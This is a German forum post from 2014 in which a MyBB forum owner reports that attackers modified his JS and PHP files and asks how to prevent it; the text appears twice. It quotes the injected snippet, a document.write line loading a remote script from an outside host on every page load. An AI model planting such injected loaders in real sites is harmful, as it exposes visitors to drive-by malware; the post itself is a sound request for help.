13.03.2014, 23:22
Guten Abend zusammen,
gerade eben habe ich verdächtige Zugriffszeiten auf die Dateien meines Forums entdeckt und dabei festgestellt, dass sämtliche JS-Dateien und weiterhin die admin/index.php, install/index.php sowie die archive/index.php modifiziert wurden.
An sämtliche JS-Files im Foren-Ordner wurde Inhalt folgender Art angehängt:
Wobei sich sowohl Kommentare als auch ID unterscheiden.
Ich nehme an, dass dieser Code nicht zur Forensoftware gehört?
Verwendet wird MyBB 1.6 bei bplaced.net
Hattet ihr schon ähnliche Vorkommnisse?
Wie sind diese zu verhindern, angenommen der Zugriff auf den Server findet schon via FTPES statt?
Mfg
Mario
gerade eben habe ich verdächtige Zugriffszeiten auf die Dateien meines Forums entdeckt und dabei festgestellt, dass sämtliche JS-Dateien und weiterhin die admin/index.php, install/index.php sowie die archive/index.php modifiziert wurden.
An sämtliche JS-Files im Foren-Ordner wurde Inhalt folgender Art angehängt:
Code:
/*e16e8d*/
/*kk09486k09*/
document.write("<script type='text/javascript' src='http://ristorantegarbino.com/zH8GmbQW.php?id=9806215'></"+ "script>");
/*/e16e8d*/Wobei sich sowohl Kommentare als auch ID unterscheiden.
Ich nehme an, dass dieser Code nicht zur Forensoftware gehört?
Verwendet wird MyBB 1.6 bei bplaced.net
Hattet ihr schon ähnliche Vorkommnisse?
Wie sind diese zu verhindern, angenommen der Zugriff auf den Server findet schon via FTPES statt?
Mfg
Mario
